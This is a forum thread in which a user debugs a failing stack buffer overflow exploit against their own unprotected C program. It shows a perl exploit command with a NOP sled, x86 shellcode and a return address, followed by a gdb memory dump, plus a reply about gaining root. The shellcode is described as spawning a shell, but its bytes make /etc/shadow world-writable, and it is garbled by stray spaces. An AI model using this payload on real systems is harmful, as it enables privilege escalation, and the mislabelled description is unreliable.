caser

Hi,

I've been making some C programs and accidentally found one to be vulnerable, I'm experimenting with exploiting it like an attacker would.

There is no VA randomization. There is no PaX/grsec. It has been compiled with gcc -f-no-stack-protector

The program is crashing with a correct EIP, there seems to be no indication why it is not returning execution to the nopsled and my shellcode like you'd expect. The shellcode is definitely OK (spawns /bin/sh, tested elsewhere).

Below is 1) The source 2) A log demonstrating my failing, but seemingly correct method

1) Source
2) Log (nopsled entry point bolded in memory dump)

shell:~$ ./vuln `perl -e '$offset = 62; $shellcode = "\x31\xd2\x6a\x0f\x58\x52\x6a\x77\x66\x68\x64\x6f\ x68\x2f\x73\x68\x61\x68\x2f\x65\x74\x63\x89\xe3\x6 6\x68\xb6\x01\x59\xcd\x80\x6a\x01\x58\xcd\x80"; $nopsled = "\x90" x ($offset - (length $shellcode)); $ret = "\xAB\xf6\xff\xbf"; print $nopsled, $shellcode, $ret'`
Hello ��������������������������1�jXRjwfhdoh/shah/etc��fh�
Ỳj
X̀����
Segmentation fault (core dumped)
shell:~$ gdb -c core
GNU gdb 6.8-debian
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
(no debugging symbols found)
Core was generated by `./vuln ��������������������������1�jXRjwfhdoh/shah/etc��fh�
Ỳj
X̀����'.
Program terminated with signal 11, Segmentation fault.
[New process 8737]
#0 0xbffff6ab in ?? ()
(gdb) x/1000b $esp
0xbffff4a0: 0x00 0x00 0x00 0x00 0x24 0xf5 0xff 0xbf
0xbffff4a8: 0x30 0xf5 0xff 0xbf 0x40 0xfb 0xff 0xb7
0xbffff4b0: 0x01 0x00 0x00 0x00 0x01 0x00 0x00 0x00
0xbffff4b8: 0x00 0x00 0x00 0x00 0x4b 0x82 0x04 0x08
0xbffff4c0: 0xf4 0xcf 0x30 0x00 0x50 0x84 0x04 0x08
0xbffff4c8: 0x40 0x83 0x04 0x08 0xf8 0xf4 0xff 0xbf
0xbffff4d0: 0x0f 0xe4 0xa0 0xea 0x70 0x71 0xc7 0x2d
0xbffff4d8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbffff4e0: 0x00 0x00 0x00 0x00 0xb0 0x39 0x1a 0x00
0xbffff4e8: 0xcd 0x46 0x1c 0x00 0xf4 0xcf 0x1a 0x00
0xbffff4f0: 0x02 0x00 0x00 0x00 0x40 0x83 0x04 0x08
0xbffff4f8: 0x00 0x00 0x00 0x00 0x61 0x83 0x04 0x08
0xbffff500: 0xf4 0x83 0x04 0x08 0x02 0x00 0x00 0x00
0xbffff508: 0x24 0xf5 0xff 0xbf 0x50 0x84 0x04 0x08
0xbffff510: 0x40 0x84 0x04 0x08 0x70 0xe8 0x19 0x00
0xbffff518: 0x1c 0xf5 0xff 0xbf 0x43 0x9f 0x1a 0x00
0xbffff520: 0x02 0x00 0x00 0x00 0x8a 0xf6 0xff 0xbf
0xbffff528: 0x91 0xf6 0xff 0xbf 0x00 0x00 0x00 0x00
0xbffff530: 0xd4 0xf6 0xff 0xbf 0xf7 0xf6 0xff 0xbf
0xbffff538: 0x0a 0xf7 0xff 0xbf 0x15 0xf7 0xff 0xbf
0xbffff540: 0x25 0xf7 0xff 0xbf 0x75 0xf7 0xff 0xbf
0xbffff548: 0xb1 0xf7 0xff 0xbf 0xc3 0xf7 0xff 0xbf
0xbffff550: 0xe3 0xf7 0xff 0xbf 0xf0 0xf7 0xff 0xbf
0xbffff558: 0x91 0xfc 0xff 0xbf 0xbe 0xfc 0xff 0xbf
0xbffff560: 0xee 0xfc 0xff 0xbf 0x42 0xfd 0xff 0xbf
0xbffff568: 0x53 0xfd 0xff 0xbf 0x6b 0xfd 0xff 0xbf
0xbffff570: 0xb8 0xfd 0xff 0xbf 0xd3 0xfd 0xff 0xbf
0xbffff578: 0xe5 0xfd 0xff 0xbf 0xf6 0xfd 0xff 0xbf
0xbffff580: 0x0d 0xfe 0xff 0xbf 0x22 0xfe 0xff 0xbf
0xbffff588: 0x35 0xfe 0xff 0xbf 0x4c 0xfe 0xff 0xbf
0xbffff590: 0x54 0xfe 0xff 0xbf 0x67 0xfe 0xff 0xbf
0xbffff598: 0x93 0xfe 0xff 0xbf 0xa3 0xfe 0xff 0xbf
0xbffff5a0: 0x05 0xff 0xff 0xbf 0x52 0xff 0xff 0xbf
0xbffff5a8: 0x72 0xff 0xff 0xbf 0x7f 0xff 0xff 0xbf
0xbffff5b0: 0x8c 0xff 0xff 0xbf 0xae 0xff 0xff 0xbf
0xbffff5b8: 0xc7 0xff 0xff 0xbf 0xec 0xff 0xff 0xbf
0xbffff5c0: 0x00 0x00 0x00 0x00 0x20 0x00 0x00 0x00
0xbffff5c8: 0x20 0x24 0xa4 0x00 0x21 0x00 0x00 0x00
0xbffff5d0: 0x00 0x20 0xa4 0x00 0x10 0x00 0x00 0x00
0xbffff5d8: 0xff 0xf3 0xeb 0x0f 0x06 0x00 0x00 0x00
0xbffff5e0: 0x00 0x10 0x00 0x00 0x11 0x00 0x00 0x00
0xbffff5e8: 0x64 0x00 0x00 0x00 0x03 0x00 0x00 0x00
0xbffff5f0: 0x34 0x80 0x04 0x08 0x04 0x00 0x00 0x00
0xbffff5f8: 0x20 0x00 0x00 0x00 0x05 0x00 0x00 0x00
0xbffff600: 0x08 0x00 0x00 0x00 0x07 0x00 0x00 0x00
---Type <return> to continue, or q <return> to quit---
0xbffff608: 0x00 0x00 0x19 0x00 0x08 0x00 0x00 0x00
0xbffff610: 0x00 0x00 0x00 0x00 0x09 0x00 0x00 0x00
0xbffff618: 0x40 0x83 0x04 0x08 0x0b 0x00 0x00 0x00
0xbffff620: 0xe8 0x03 0x00 0x00 0x0c 0x00 0x00 0x00
0xbffff628: 0xe8 0x03 0x00 0x00 0x0d 0x00 0x00 0x00
0xbffff630: 0xe8 0x03 0x00 0x00 0x0e 0x00 0x00 0x00
0xbffff638: 0xe8 0x03 0x00 0x00 0x17 0x00 0x00 0x00
0xbffff640: 0x00 0x00 0x00 0x00 0x19 0x00 0x00 0x00
0xbffff648: 0x6b 0xf6 0xff 0xbf 0x1f 0x00 0x00 0x00
0xbffff650: 0xf5 0xff 0xff 0xbf 0x0f 0x00 0x00 0x00
0xbffff658: 0x7b 0xf6 0xff 0xbf 0x00 0x00 0x00 0x00
0xbffff660: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbffff668: 0x00 0x00 0x00 0x95 0x02 0x67 0x1b 0xa1
0xbffff670: 0xc4 0xea 0xee 0x74 0xb8 0xdf 0x99 0xbc
0xbffff678: 0x4e 0x77 0x26 0x69 0x36 0x38 0x36 0x00
0xbffff680: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbffff688: 0x00 0x00 0x2e 0x2f 0x76 0x75 0x6c 0x6e
0xbffff690: 0x00 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff698: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff6a0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff6a8: 0x90 0x90 0x90 0x31 0xd2 0x6a 0x0f 0x58
0xbffff6b0: 0x52 0x6a 0x77 0x66 0x68 0x64 0x6f 0x68
0xbffff6b8: 0x2f 0x73 0x68 0x61 0x68 0x2f 0x65 0x74

Thanks in advance!

kiddies

nice tutorial, for basic buffer overflow....we can develop with gaining root akses with buffer overflow...